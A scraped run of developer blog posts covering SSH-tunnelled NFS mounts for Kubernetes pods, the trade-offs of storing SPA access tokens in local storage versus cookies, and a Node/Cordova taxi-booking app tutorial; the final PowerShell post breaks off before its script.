This article I am going to discuss about the option of Tunnel over SSH with Kubernetes pods application which mount the shard path from the NFS server. In general, Tunnel over SSH implementation is common and easy to implement for the scenarios of port forwarding between two machines NFS server and NFS server. This machines can be either windows or Linux or combination of both.<div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4shwAW_QpBd54vhtAl9AXuhROVO7vshS7CuU1t-NCxXhGMHWomthBMT00fxwnPS4PgB8qmP0KXH1r8IoJp9L7W9Ws6SAC2DAigp9QwyPAWaoQapJedjFwkHhHq4KlkaYGsJRSu1kZ5AVryNNowxWsegxj755PaQLWqeKFE1BRvIaWFYpoJpPAG0Uc/s902/nfs-encryption.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="398" data-original-width="902" height="282" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4shwAW_QpBd54vhtAl9AXuhROVO7vshS7CuU1t-NCxXhGMHWomthBMT00fxwnPS4PgB8qmP0KXH1r8IoJp9L7W9Ws6SAC2DAigp9QwyPAWaoQapJedjFwkHhHq4KlkaYGsJRSu1kZ5AVryNNowxWsegxj755PaQLWqeKFE1BRvIaWFYpoJpPAG0Uc/w640-h282/nfs-encryption.png" width="640" /></a></div><br /><div><br />
<br />
The challenging part comes into picture for the scenarios with Kubernetes cluster in place and when your NFS clients wants to mount the NFS server shared path into a Kubernetes application. The reason why it’s challenging is because Kubernetes pods does not mount the shared path directly instead it depends on cluster “Persisted Volume Claims” and this would raise a request resource to the “Persistent volume” of the cluster. <br />
<br />
1.<span style="white-space: pre;"> </span>RHEL – Linux master as NFS server<br />
2.<span style="white-space: pre;"> </span>RHEL – Linux node as NFS client and also maintaining running pods and providing the Kubernetes runtime environment.<br />
<br />
A share with name “ NFS_Senstive_Data_Share” will be created in NFS server and which will be accessed from an Kubernetes pod application as an mounted path.<br />
<br />
Before we start into implementation, would like to give quick explanation of how tunnel over SSH works with a sample in short.<br />
<br />
ssh -fNv -c aes192-ctr -L 2049:127.0.0.1:2049 SERVICEUSER@NFSServerIP sleep 365d<br />
<br />
The above command runs in NFS client takes any traffic directed at NFS client's local port 2049 just forwards it, first through SSHD on the remote server (NFS server), and then on to the remote server's(NFS Server) port 2049. This port forwarding can run as background process which can be running in defined long periods. The user session b/w NFS client and NFS Server will be created by the SSH Session Key pair (RSA public & private keys) and login will happen through the key files instead of typing passwords.<br />
<br />
Hoping it would have given a basic understanding of how Tunnel over SSH port forwarding work.<br />
<br />
Lets move into the implementation:<br />
<br />
<b>Configuring NFS Server and NFS client</b><br />
<br />
<b><br /></b>
<script src="https://gist.github.com/ramkrivas/31d9993414e96c860813f060fbf182de.js"></script><br />
<br />
Now the Tunnel over SSH successfully enabled, all incoming traffic to NFS client ports will be forwarded to NFS server ports through SSHD.<br />
<br />
Few points to notice in above commands<br />
<b>Aes256</b> – forward forwarding uses AES 256 cryptography algorithm<br />
<b>-f </b> - which makes the port forwarding to run in background ssh persists until you explicitly kill it with the Unix kill command.
<br />
<br />
<b>Now let's configure the Kubernetes</b><br />
<br />
Configuring Kubernetes persistent volume and claims<br />
<br />
<script src="https://gist.github.com/ramkrivas/4e2b2c2eb66f7cdf24c81db012c9a934.js"></script>
That’s all, now just deploy this pod and K8s PV volume files. Once deployment done, a persistent volume within K8s with Tunnel over SSH enabled mount will be created in NFS client (linux node)
<br />
<br />
Let’s verify things :<br />
<br />
<b>First</b>, lets verify the PV volume mount is created in the NFS client (linux node)<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">[root@NFSClient ~]# mount | grep nfs</span><br />
<br />
You would get an output like<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">localhost:/NFS_Senstive_Data_Share on /var/lib/kubelet/pods/794ea09e-0354-436d-9498-6038f352e64c/volumes/kubernetes.io~nfs/nfs-pvclaim-sensitivedata type nfs4 (rw,relatime,vers=4.2,rsize=1048576,wsize=1048576,namlen=255,hard,proto=tcp,timeo=600,retrans=2,sec=sys,clientaddr=127.0.0.1,local_lock=none,addr=127.0.0.1)</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: "courier new" , "courier" , monospace;">and also verify SSH Tunnel is active using below command</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"></span><br />
<span style="font-family: courier new, courier, monospace;">sudo lsof -i -n | egrep '\<ssh\>'</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<b>Second</b>, let’s try to access the volume mount path inside Kubernetes pods.<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">[root@NFSServer ~]# kubectl exec -it nfs-in-a-pod -n myproductNamespace -- sh</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">[root@NFSServer ~]# cd /mnt</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">[root@NFSServer ~]# ls ------ here you can see the files inside the NFS shared folder.</span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="font-family: inherit;">That’s all, now the volume mount is created inside Kubernetes POD and the traffic between NFS Server (Linux Mode) and NFS Client (Linux node or K8s pods) are ENCRYPTED !!!</span></div>Ramkumar Krishnanhttp://www.blogger.com/profile/07593862251269402877noreply@blogger.com0tag:blogger.com,1999:blog-6523941902002289478.post-13487668069204365832019-08-20T12:06:00.005+05:302022-01-30T10:51:59.918+05:30Angular/React - Public client Single Page Applications - a secure practice on where to store the Access Token?<br /><div class="MsoNormal" style="text-align: justify;"><span style="text-align: left;">Authentication implementation for standalone SPA (without a dedicated backend server, see image below) would always have to go through a scenario "Where to store the access token? "on successful authentication and token exchange with the identity provider</span>.<o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1Z_tIdb7gBEj_tsNX-Cgg2Tjy0d3joqsQXzGAFdYbyyoOjPbLVBaXVADnkOhOB2K-w50EVYUeV3GmW76uj3z3UERxssLlFeercH_2uut3X52ouxqfpHDdofT1_-YULwkQtqCBVAGppw8/s1600/standaloneSPA.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="286" data-original-width="522" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1Z_tIdb7gBEj_tsNX-Cgg2Tjy0d3joqsQXzGAFdYbyyoOjPbLVBaXVADnkOhOB2K-w50EVYUeV3GmW76uj3z3UERxssLlFeercH_2uut3X52ouxqfpHDdofT1_-YULwkQtqCBVAGppw8/s1600/standaloneSPA.jpg" /></a></div>
<br />
<div class="MsoNormal" style="text-align: justify;"><div class="MsoNormal">Typically, we are forced to choose either browser storage or browser cookie in such scenarios. The beauty is both are open to vulnerable and it's up to developers to decide which has higher security countermeasures in our application which makes less vulnerable than the other. Period!</div><div class="MsoNormal">If we google to get an answer from experts, we will end up getting a mixed answer. since both options have their pros and cons. This section discusses the pros and cons of both options and the hybrid approach which I recently implemented in one of our application.</div></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<b>On a high level</b>,<o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">if we proceed with browser storage - we open a window for XSS attacks and mitigation implementation.</div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">if we proceed with browser cookies - we open a window for CSRF attacks and mitigation implementation.</div><div class="MsoNormal" style="text-align: justify;"><br /></div>
<div class="MsoNormal" style="text-align: justify;">
<b>In detail,<o:p></o:p></b></div>
<div class="MsoNormal" style="text-align: justify;">
<b><br /></b></div>
<h3 style="text-align: justify;"><b><u><span style="font-size: medium; line-height: 107%;">Storing
Access token in</span></u></b><u><span style="line-height: 107%;"><span style="font-size: medium;"> </span><b><span style="mso-themecolor: accent2; mso-themeshade: 128;"><span style="font-size: medium;">browser storage:</span><o:p style="font-size: 12pt;"></o:p></span></b></span></u></h3>
<div class="MsoNormal" style="text-align: justify;">
<u><span style="font-size: 12pt; line-height: 107%;"><b><span style="color: #833c0b; mso-themecolor: accent2; mso-themeshade: 128;"><br /></span></b></span></u></div>
<div class="MsoNormal" style="text-align: justify;">
Assuming our application authenticates the user from backend AUTH REST service and gets Access token in response and stores in browser local storage to do authorized activities.</div><div class="MsoNormal" style="text-align: justify;"><br /></div>
<div class="MsoNormal" style="text-align: justify;">
<u>Pros:<o:p></o:p></u></div>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l1 level1 lfo1; text-indent: -0.25in;">
</div>
<ul>
<li style="text-align: justify;">With powerful Angular framework default
protection of untrusting all values before sanitizing it, XSS attacks are much
easier to deal with compared to XSRF.</li>
<li style="text-align: justify;">As like a cookie, local storage information is NOT
being carried in all requests (default behavior of browser for cookies) and
local storage by default has same-origin protection.</li>
<li style="text-align: justify;">RBAC on the UI side can be implemented without much
effort since access token with permission details are still be accessible by
Angular code.</li>
<li style="text-align: justify;">There is no limit for Access token size (cookie
has a limit of ONLY 4KB), it may be problematic if you have many claims and user
permission are attached to the token.</li>
</ul>
<!--[if !supportLists]--><o:p></o:p><br />
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l1 level1 lfo1; text-indent: -0.25in;">
<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l1 level1 lfo1; text-indent: -0.25in;">
<o:p></o:p></div>
<div class="MsoListParagraphCxSpLast" style="mso-list: l1 level1 lfo1; text-indent: -0.25in;">
<o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
<u>Cons:<o:p></o:p></u></div>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l1 level1 lfo1; text-indent: -0.25in;">
</div>
<ul>
<li style="text-align: justify;"><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;"><span style="font: 7pt "Times New Roman";"> </span></span></span><!--[endif]-->In case an XSS attack happened, a hacker can steal
the token and do unauthorized activities using a valid access token
impersonating the user. </li>
<li style="text-align: justify;"><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;"><span style="font: 7pt "Times New Roman";"> </span></span></span><!--[endif]-->Extra effort is might be required for the developer to
implement an HTTP interceptor for adding bearer token in HTTP requests. </li>
</ul>
<!--[if !supportLists]--><o:p></o:p><br />
<div class="MsoListParagraphCxSpLast" style="mso-list: l1 level1 lfo1; text-indent: -0.25in;">
<o:p></o:p></div>
<h3 style="text-align: justify;"><b><u><span style="font-size: 12pt; line-height: 107%;">Storing
Access token in<span> a "browser cookie"<span style="color: #7030a0;"><o:p></o:p></span></span></span></u></b></h3>
<div class="MsoNormal" style="text-align: justify;">
<b><u><span style="font-size: 12pt; line-height: 107%;"><span style="color: #7030a0;"><br /></span></span></u></b></div>
<div class="MsoNormal" style="text-align: justify;">
Assuming our application authenticates the user from backend
AUTH REST service and gets Access token in response and stores in a browser cookie
(as HTTP only cookie) to do authorized activities.<o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<u>Pros:<o:p></o:p></u></div>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l1 level1 lfo1; text-indent: -0.25in;">
</div>
<ul>
<li style="text-align: justify;">As it’s an HTTP-only cookie, XSS attacks cannot
succeed in injecting scripts to steal token. Gives good prevention for XSS attacks stealing
access token</li>
<li style="text-align: justify;">No extra effort is required to pass access token as a bearer in each request. since as default browser behavior cookies will be passed
in each request.</li>
</ul>
<div class="MsoNormal" style="text-align: justify;">
<u>Cons:<o:p></o:p></u></div>
<ul>
<li style="text-align: justify;">Extra effort needs to be taken to prevent CSRF
attacks. Though Same Site cookie and Same Origin headers checking gives CSRF
prevention, still OWSAP standards recommend having this only as a secondary
defense. NOT recommending considering as primary defense since it’s still can
be bypassed by section <a href="https://tools.ietf.org/html/draft-ietf-httpbis-rfc6265bis-02#section-5.3.7.1">https://tools.ietf.org/html/draft-ietf-httpbis-rfc6265bis-02#section-5.3.7.1</a></li>
<li style="text-align: justify;">Extra effort to implement XSRF /Anti forgery
token implementation and validation. (If backend services are still vulnerable
for Form action requests). and, need to have an HTTP interceptor in Angular client
to add XSRF token in the request header. </li>
<li style="text-align: justify;">Max cookie size supported is 4 KB, it may be
problematic if you have many claims and user permission is attached to the
token.</li>
<li style="text-align: justify;">As a default browser behavior access token
cookie are being carried automatically in all requests, this is always an open
risk if any misconfiguration in allowed origins. </li>
<li style="text-align: justify;">XSS attack vulnerability can be used still to defeat all CSRF mitigation techniques available.</li>
</ul>
<!--[if !supportLists]--><o:p></o:p><br />
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l1 level1 lfo1; text-indent: -0.25in;">
<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l1 level1 lfo1; text-indent: -0.25in;">
<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l1 level1 lfo1; text-indent: -0.25in;">
<o:p></o:p></div>
<div class="MsoListParagraphCxSpLast" style="text-align: justify; text-indent: -0.25in;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;">·</span></span><o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
<b><u><span style="font-size: 12pt; line-height: 107%;">Storing
Access token in</span></u></b><u><span style="font-size: 12pt; line-height: 107%;"> <b><span style="color: #c55a11; mso-style-textfill-fill-alpha: 100.0%; mso-style-textfill-fill-color: #C55A11; mso-style-textfill-fill-colortransforms: lumm=75000; mso-style-textfill-fill-themecolor: accent2; mso-themecolor: accent2; mso-themeshade: 191;">Hybrid approach:<o:p></o:p></span></b></span></u></div>
<div class="MsoNormal" style="text-align: justify;">
<u><span style="font-size: 12pt; line-height: 107%;"><b><span style="color: #c55a11; mso-style-textfill-fill-alpha: 100.0%; mso-style-textfill-fill-color: #C55A11; mso-style-textfill-fill-colortransforms: lumm=75000; mso-style-textfill-fill-themecolor: accent2; mso-themecolor: accent2; mso-themeshade: 191;"><br /></span></b></span></u></div>
<div class="MsoNormal" style="text-align: justify;">
For a scenario like Oauth2.0 flow integration for SPA client (either
“Implicit grant flow” or Auth code with PKCE extension flow”) after user authentication
and token exchange, the respective identity providers (ex: identityserver 4,
Azure AD B2C, ForgeRock..etc) would return access token as an HTTP response, it
won’t set access token as response header as a cookie. This is the default behavior
of all identity providers for public clients “implicit flow” or “Auth code + PKCE
flow” since Access token can NOT be in a cookie in server-side, enabling “Same-site”
or “HTTP-Only” properties are not possible. These properties can be set only
from the server-side. <span style="mso-spacerun: yes;"> </span><o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="mso-spacerun: yes;"><br /></span></div>
<div class="MsoNormal" style="text-align: justify;">
For the scenarios like above, the only way to store access
token is either browser local storage or session storage. But if we store
access token and your application is vulnerable to an XSS attack then we are
at risk of hackers would steal the token from local storage and impersonating that
valid user permissions.<o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
Considering above mentioned possible threats. I would recommend
having a Hybrid approach for better protection from XSS and XSRF attacks.<o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
“Continue storing access token in local storage but as secondary protection or defense-in-depth protection have session fingerprint
check. This session fingerprint should be stored as an HTTP Only cookie which XSS
could not tamper it. <span style="mso-spacerun: yes;"> </span>While validating
the access token in the Authorization header, also validate the session fingerprint
HTTP only cookie. If both Access token and session fingerprint HTTP only cookie
are valid then pass the requests as valid, if HTTP only cookie is missing then
make the request invalid and return Unauthorized.<o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
In this way, even if an XSS attack happened, the hacker stole a token
from local storage but still, a hacker can not succeed in doing unauthorized activities.
since the secondary defense of checking referenced HTTP only auth cookie hacker
would not get in XSS attacks.<span style="mso-spacerun: yes;"> </span>we are
much protected now!<o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
I would recommend the above Hybrid approach only for the scenarios
you have only having a choice of storing access token in local storage or session
storage. <o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
But, in case your application has the possibility of setting
access token in the cookie at server-side after success full authentication. with “HTTP
Only”,” Same-site=Lax”,” Secure Cookie” are enabled still I would recommend
storing access token in a cookie with below open risks.<o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l0 level1 lfo2; text-indent: -0.25in;">
</div>
<ul>
<li style="text-align: justify;"><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"><span style="mso-list: Ignore;"><span style="font: 7pt "Times New Roman";"> </span></span></span><!--[endif]-->As per OWSAP standards, “same-site” cookie and
“same-origin/header” checks are only considered as a secondary defense. XSRF
token-based mitigation is to be recommended as “primary defense” which again requires
developer efforts in each module to implement XSRF token in HTTP interceptor. <span style="mso-spacerun: yes;"> </span>or as an alternative, you are giving proper justification
to live with the open vulnerability of having only “secondary defense” as CSRF
protection.</li>
<li style="text-align: justify;">If none of our GET APIs are not "State
changing requests", the developer not violating the section: <a href="https://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html#sec9.1.1">https://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html#sec9.1.1</a></li>
<li style="text-align: justify;">if we don’t foresee, our token size won’t reach
4KB in the future. The current size is ~2KB.</li>
<li style="text-align: justify;">If Samesite=strict applied, it would impact the
application behavior since it would block cookie passed in top-level
navigation requests too.</li>
<li style="text-align: justify;">If None of our backend services supports
[FromQuery] and [FromForm] data binding.</li>
<li style="text-align: justify;">Teams are justified to live with the “Cons” of
browser cookie explained in the above section.</li>
</ul>
<!--[if !supportLists]--><o:p></o:p><br />
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo2; text-indent: -0.25in;">
<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo2; text-indent: -0.25in;">
<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo2; text-indent: -0.25in;">
<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo2; text-indent: -0.25in;">
<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo2; text-indent: -0.25in;">
<o:p></o:p></div>
<div class="MsoListParagraphCxSpLast" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-size: 14pt; line-height: 107%;">Conclusion<o:p></o:p></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-size: 14pt; line-height: 107%;"><br /></span></div>
<div style="text-align: justify;">The debate of choosing whether browser storage or browser cookie would continue unless our SPA design has a dedicated backend server that would store the access token in the server in HTTP context and NOT at all expose the access token to the browser.</div><div style="text-align: justify;"><br /></div>
<div style="text-align: justify;">Until then, it's up to developers to decide in our application which browser storage mechanism has more multi-layered (primary and depth in deep defense) protection than others, which makes it less vulnerable to others. The decision behind continuing with browser storage is explained above and the possibilities of storing in browser cookie with open risks are mentioned above.</div>
<div style="text-align: justify;">
<br /></div>
Ramkumar Krishnanhttp://www.blogger.com/profile/07593862251269402877noreply@blogger.com0tag:blogger.com,1999:blog-6523941902002289478.post-34171414759634893102018-12-18T23:35:00.004+05:302022-04-22T17:37:52.341+05:30How to build a basic online Taxi service mobile application<div class="entry-meta"><a class="entry-date published">December 7, 2018</a></div>
<span >In this tutorial, we will see how to build a basic UBER or OLA like functional Taxi booking service mobile application and what it involves to host in google play store.</span><br />
<span ><span style="
-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;"><br /></span>
<span >This is the experiment I did few months back in spare time. Here, will try to explain technology stack involved in development from end to end and sharing my github repository where you can access entire source code too.</span></span><br />
<span ><span ><br /></span>
<span >To develop back end and front end, the technology stack I have chosen are</span></span><br />
<ul>
<li><span ><b>Node</b> as web server</span></li>
<li><span ><b>Node Express JS</b> - as web framework</span></li>
<li><span ><b>HTML 5 Geo location API</b> /Google map API - for location navigation</span></li>
<li><span ><b>Mongo DB</b> - as data source to store cab driver & user information.</span></li>
<li><span ><b>Socket.IO</b> - as websocket programming library for real-time bidirectional event-based communication for live location emitting</span></li>
<li><span ><b>RabbitMQ</b> - for scalability as message broker to the subscribed web sockets.</span></li>
<li><span ><b>Cordova</b> - Hybrid mobile application development framework ( i.e can run in both IOS and Android)</span></li>
<li><span ><b>Express JS</b> - Building Rest API services backbone.</span></li>
</ul>
<span ><span ><br /></span>
<span ><i>* Note: I have read in google, currently the Uber architecture also is based on Node Server only.</i></span></span><br />
<span ><span ><br /></span>
<span >For any basic can booking service application, the high level requirements can be</span></span><br />
<span ><span ><br /></span>
<span ><b>As Uber driver login:</b></span></span><br />
<span >
</span>
<br />
<ul>
<li><span >Ability to sign up and login as driver</span></li>
<li><span >Create profile Email, Phone number payment account information.</span></li>
<li><span >Live navigation to cab service booked user pick up and drop location</span></li>
<li><span >Push notification if new users booked.</span></li>
<li><span >Ability to view booked users basic information.</span></li>
</ul>
<span ><span ><br /></span>
<span ><span ><b>As Uber user login:</b></span></span></span><br />
<span >
</span>
<br />
<ul>
<li><span ><span >Ability to sign up and login as user</span></span></li>
<li><span ><span >Create profile Email, Phone number, etc</span></span></li>
<li><span ><span >Live listings of taxi's which are near by</span></span></li>
<li><span ><span >Ability to see list of taxi options available ( Mini, Zedan...etc)</span></span></li>
<li><span ><span >Ability to book taxi for trip</span></span></li>
<li><span ><span >Live navigation tracking of where cab driver coming now</span></span></li>
</ul>
<span >
<span >:-) Hope it has basic needed functionalities.</span></span><br />
<span ><span ><br /></span>
<span ><b><br /></b></span><span ><b>Ok..Let's IMPLEMENT...</b></span></span><br />
<span ><span ><br /></span>
<span >Before we start coding, let us first setup the development environment needed to run our application.</span></span><br />
<span ><br /></span>
<br />
<h3>
<span ><span >Node setup </span></span></h3>
<div>
<span ><span ><br /></span></span></div>
<div>
<span ><span >if you are new to Node development, you can follow below steps to setup node dev environment in your machine.</span></span></div>
<div>
<span ><span ><br /></span></span></div>
<div>
<span >Download and install Node from</span></div>
<span > <a href="https://nodejs.org/en/">https://nodejs.org/en/</a></span><br />
<ul>
<li style="text-align: left;"><span >Make sure you added Node JS in your system environment PATH variable.</span></li>
<li style="text-align: left;"><span >To test installation, open command prompt and type "node ---version". If version number displayed. It installed correctly and working !</span></li>
</ul>
<span ><span ><br /></span>
</span><br />
<h3>
<span ><b>Setting Up Database environment</b></span></h3>
<span ><br /></span>
<span > For user management and taxi booking session management the backend database system I used is MongoDB instance. Considering the advantages, easy Node + MongoDB integration and cost fact of cloud service provider with the account I have, i had chosen MonogDB as DB instance, but it is absolutely your choice to prefer a reliable DB system.</span><br />
<span ><span ><br /></span>
<span ><span >For peoples who are new to MongoDB</span>, you can follow my old post related to setting up MongoDB development environment.</span></span><br />
<span ><span ><a href="http://ramstepsonweb.blogspot.in/2016/01/how-to-setup-mongodb-environment.html."><br /></a></span>
<span ><a href="http://ramstepsonweb.blogspot.in/2016/01/how-to-setup-mongodb-environment.html."><span style="white-space: pre;"> </span>http://ramstepsonweb.blogspot.in/2016/01/how-to-setup-mongodb-environment.html.</a></span></span><br />
<span style="white-space: pre;"><span > </span></span><br />
<span ><span ><br /></span>
<span ><b>Testing MongoDB installation in your machine.</b></span></span><br />
<span ><span ><br /></span>
<span >Open command prompt</span></span><br />
<ul>
<li><span >Navigate to “C:\MongoDB\Bin” folder (or the path you have installed MongoDB) in command prompt</span></li>
<li><span ><span >Type “Mongod” and hit enter. Now you</span> <span >should be able to see message like</span> “Waiting for connections on port 27017” in your command prompt</span></li>
<li><div style="text-align: left;">
<span ><span >Open a new command prompt ( don’t close exiting command prompt ) and n</span>avigate to “C:\MongoDB\Bin” folder in command prompt. Type “Mongo” and enter. You will be getting a message “MongoDB shell version and connecting to “test” db” Also you can notice in other opened command prompt, the console message got changed to “Connection accepted from “127.0.0.1”…etc”</span></div>
</li>
</ul>
<div style="text-align: left;">
<h4>
<span ><br /></span></h4>
<h3>
<span ><b>Setting Up Cordova platform</b></span></h3>
</div>
<span ><span ><span ><br /></span></span>
<span ><span >Corodova is the mobile development platform for Hybrid mobile application development.</span></span></span><br />
<span ><span ><span ><br /></span></span>
<span ><span >For peoples who are new to Cordova Hybrid app development, here are the steps to setup development environment in your local machine.</span></span></span><br />
<span ><span ><span ><br /></span></span>
<span ><span ><span >Cordova behind the scenes running in GIT version control system, so as prerequisites first install GIT in your machine ( ignore if you already have GIT installed in your machine) </span></span>Download and install from: http://git-scm.com. Default settings are recommended.</span></span><br />
<span ><span ><br /></span><span ><span style="white-space: pre;">After GIT installation you can install Cordova using </span>Node Package Manager (npm). </span></span><br />
<span ><span ><span ><br /></span></span>
<span >npm install -g cordova</span></span><br />
<span ><span > </span></span><br />
<span ><span style="white-space: pre;">You can confirm the installation by running </span>cordova --version in your command prompt.</span><br />
<span ><br /></span>
<br />
<h3>
<span ><b>Other Dependencies Setup</b></span></h3>
<div>
<span ><b><br /></b></span></div>
<ul>
<li><span >Download and install RabbitMQ from :https://www.rabbitmq.com/install-windows.html</span></li>
<li><span >In command prompt navigate to project folder run below commands to setup the express and mongo client dependencies. </span></li>
</ul>
<span > <span >npm install -g express</span></span><br />
<span > npm install mongodb -- save (<i><span style="font-size: x-small;">IMPORTANT : Npm installs latest version of MongoDB which does not supprt. db.collection() function, hence update project.json file to change mongodb version to "^2.1.4"</span></i>)</span><br />
<span > npm install socket.io --save</span><br />
<span ><br /></span>
<span ><br /></span>
<span >All Done, you have the development environment setup.</span><br />
<span ><br /></span>
<br />
<h3>
<span ><b>Run the Code and Mobile APP build </b></span></h3>
<div>
<span ><b><br /></b></span></div>
<span ><span >Clone the source code from my Github repository</span></span><br />
<span ><span ><a href="https://github.com/ramkrivas/ani-hola.git">https://github.com/ramkrivas/ani-hola.git</a></span></span><br />
<span ><span ><br /></span></span>
<span >In the command prompt </span><br />
<span ><br /></span>
<span >> Navigate to "C:\MongoDB\bin" and start MongoDB instance</span><br />
<span > Type Mongod in one command prompt</span><br />
<span > Type Mongo in another command prompt </span><br />
<span ><br /></span>
<span ><span ><span >> Navigate to </span></span>"NodeAppDevelopment" folder and run node server file by " node hehaserver.js". This will run the application in your local machine.</span><br />
<span ><br /></span>
<span >> Navigate to "Services" folder and APIServer.js NODE server file, this will run API in your machine.</span><br />
<span ><br /></span>
<br />
<h3>
<span >Host the app in<b> Google Play store.</b></span></h3>
<div>
<span ><b><br /></b></span></div>
<div>
<span >As prerequisites makes sure your node App and DB instance are running in cloud or in your on-premises system.</span></div>
<div>
<span ><br /></span></div>
<div>
<span >To host your application in play store, you would need a google play store licence which may cost of 25 $ </span></div>
<div>
<span ><br /></span></div>
<div>
<span >To build your application for play store hosting ready. you can follow below steps.</span></div>
<div>
<span ><br /></span></div>
<div>
<span >Assuming your project folder is C:\MyUberApp</span></div>
<div>
<div>
<span ><br /></span></div>
<div>
Step 1: Navigate to your Project Folder in command prompt<br />
<br />
Step 2: Type "cordova build --release android"<br />
<br />
Step 3 : Navigate to build output path: ...\platforms\android\build\outputs\apk<br />
<br />
Step 4: Sign apk using below command<br />
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore YOURAPP.keystore android-release-unsigned.apk YOURAPP<br />
<br />
Step 5: Compress/zip apk<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>Naivate to below path in command prompt:<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>C:\AndroidStudio\build-tools\23.0.2\<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>Run the below command<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span>zipalign -v 4 android-release-unsigned.apk YOURAPP.apk<br />
<span class="Apple-tab-span" style="white-space: pre;"> </span><br />
Now the APK is ready in below path to release in Play store<br />
../platforms\android\build\outputs\apk\YOURAPP.apk<br />
<br /></div>
</div>
<div>
<span ><br /></span></div>
<div>
<span >The above steps will give an APK which you can upload in your play store account and make it LIVE !! .</span></div>
<div>
<span ><br /></span></div>
<div>
<span ><br /></span></div>
<div>
<span >That's all.. Your Taxi booking service application is now ready. Enjoy riding with your friends !!!</span></div>
<span ><span ><br /></span></span>
Ramkumar Krishnanhttp://www.blogger.com/profile/07593862251269402877noreply@blogger.com23tag:blogger.com,1999:blog-6523941902002289478.post-54869613629699007512018-11-29T21:13:00.001+05:302020-12-13T09:49:04.894+05:30Moving Azure Application Insights alerts from one app insight to another app insight using Powershell<span style="white-space: pre;"> </span><br />
I was working with a person who works in Microsoft US and helping him as freelancer for Powershell scripting. Recently he had come to me with the task of moving azure App insights alerts/rules from one app insight to another another app insight. He wanted a quick solution since he was having demo with customer in few days. As there was NO straight forward PS scripting approach to accomplish this, I've find a workaround to implement using Management.azure.com token and calling azure internal API to do this operation and it worked like a charm !.<br />
<br />
Here is the script which I wrote:<br />
<span style="white-space: pre;"> </span><br />
<span style="white-space: pre;"> </span>
